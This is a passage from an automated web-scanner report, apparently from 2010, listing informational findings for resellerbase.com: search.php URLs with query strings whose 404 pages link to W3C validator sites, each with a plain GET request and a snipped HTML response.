GET /detail/33/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/33/love-money-de-german.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.180. http://www.resellerbase.com/detail/34/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/34/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/34/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/34/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/34/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.181. http://www.resellerbase.com/detail/35/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/35/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/35/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/35/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/35/awempire-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.182. http://www.resellerbase.com/detail/35/themes/kosmos/images/rating/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/35/themes/kosmos/images/rating/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/35/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/35/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/35/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.183. http://www.resellerbase.com/detail/35/themes/kosmos/images/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/35/themes/kosmos/images/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/35/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/35/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/35/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.184. http://www.resellerbase.com/detail/35/themes/kosmos/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/35/themes/kosmos/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/35/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/35/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/35/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.185. http://www.resellerbase.com/detail/35/themes/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/35/themes/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/35/themes/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/35/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/35/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.186. http://www.resellerbase.com/detail/36/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/36/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/36/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/36/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/36/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.187. http://www.resellerbase.com/detail/37/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/37/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/37/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/37/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/neondollars-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.188. http://www.resellerbase.com/detail/37/themes/kosmos/images/rating/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/37/themes/kosmos/images/rating/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/37/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/37/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.189. http://www.resellerbase.com/detail/37/themes/kosmos/images/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/37/themes/kosmos/images/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/37/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/37/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.190. http://www.resellerbase.com/detail/37/themes/kosmos/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/37/themes/kosmos/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/37/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/37/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.191. http://www.resellerbase.com/detail/37/themes/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/37/themes/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/37/themes/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/37/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.192. http://www.resellerbase.com/detail/38/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/38/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/38/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/38/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/whitelabelcash-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.193. http://www.resellerbase.com/detail/38/themes/kosmos/images/rating/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/38/themes/kosmos/images/rating/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/38/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/38/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.194. http://www.resellerbase.com/detail/38/themes/kosmos/images/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/38/themes/kosmos/images/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/38/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/38/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.195. http://www.resellerbase.com/detail/38/themes/kosmos/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/38/themes/kosmos/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/38/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/38/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.196. http://www.resellerbase.com/detail/38/themes/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/38/themes/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/38/themes/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/38/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

